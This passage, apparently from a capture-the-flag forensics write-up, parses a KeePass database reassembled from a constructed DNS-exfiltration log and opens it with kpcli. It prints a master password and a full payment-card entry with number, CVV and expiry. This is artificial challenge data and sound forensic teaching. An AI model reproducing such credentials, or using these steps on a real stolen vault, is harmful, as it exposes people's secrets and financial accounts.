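               8: "ProtectedStreamKey", 9: "StreamStartBytes", 10: "InnerRandomStreamID"}


def parse_kdbx3_header(data: bytes) -> dict:
    if data[:8] != KDBX_SIG:
        raise ValueError("not a KDBX 2.x+ file")
    minor, major = struct.unpack_from("<HH", data, 8)
    if major != 3:
        raise ValueError(f"header layout for KDBX {major}.{minor} not handled")
    fields, pos = {}, 12
    while True:
        if pos + 3 > len(data):
            raise ValueError("header truncated: exfiltrated data is incomplete")
        fid, size = struct.unpack_from("<BH", data, pos)
        value = data[pos + 3:pos + 3 + size]
        if len(value) != size:
            raise ValueError("header truncated: exfiltrated data is incomplete")
        fields[FIELD_NAMES.get(fid, fid)] = value
        pos += 3 + size
        if fid == 0:
            return {"version": (major, minor), "header_len": pos, "fields": fields}


def summarize(header: dict) -> dict:
    f = header["fields"]
    cipher = uuid.UUID(bytes=f["CipherID"])
    return {
        "version": header["version"],
        "cipher": "AES-256" if cipher == AES256_UUID else str(cipher),
        "compression": struct.unpack("<I", f["CompressionFlags"])[0],      # 1 = gzip
        "transform_rounds": struct.unpack("<Q", f["TransformRounds"])[0],
        "inner_stream": struct.unpack("<I", f["InnerRandomStreamID"])[0],  # 2 = Salsa20
        "header_len": header["header_len"],
    }


if __name__ == "__main__":
    data = reassemble(constructed_dns_log())
    print(len(data), "bytes recovered;", summarize(parse_kdbx3_header(data)))
```

On the ten chunks shown the outer header parses completely within the first 222 bytes (KDBX 3.1, AES-256, gzip, 60000 AES-KDF rounds, Salsa20 inner stream), which is a stronger check than the file(1) magic alone: a capture missing a chunk fails the size check on the field that spans the gap instead of yielding a file KeePass refuses with an unhelpful error.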
Finally, opening the KeePass database with the password %p9^3!lL^Mz47E2GaT^y reveals a company card entry with the account number 4024007128269551:
$ kpcli --kdb=protected_data.kdbx
Provide the master password: *************************
kpcli:/> dir
=== Groups ===
protected_data/
kpcli:/> cd protected_data
kpcli:/protected_data> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/protected_data> cd Homebanking
kpcli:/protected_data/Homebanking> dir
=== Entries ===
0. Company Card
kpcli:/protected_data/Homebanking> show 0
Title: Company Card
Uname:
Pass:
URL:
Notes:
String Values:
1) Account Number = 4024007128269551
2) CVV = 970
3) Expiration Date = 3/2028
4) Name = Quick Logistics LLC
Last updated